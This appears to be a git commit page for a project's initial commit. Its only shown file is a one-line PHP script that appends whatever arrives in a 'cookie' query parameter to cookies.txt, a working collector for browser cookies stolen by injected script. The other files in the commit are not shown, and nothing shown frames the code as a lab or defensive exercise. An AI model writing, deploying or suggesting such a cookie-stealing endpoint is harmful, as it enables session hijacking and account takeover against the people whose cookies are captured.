Initial commit

This commit is contained in:
2024-06-28 18:50:56 -06:00
commit 9c7ec708fb
8 changed files with 905 additions and 0 deletions
@@ -0,0 +1 @@
<?php file_put_contents("cookies.txt", $_GET['cookie'], FILE_APPEND); ?>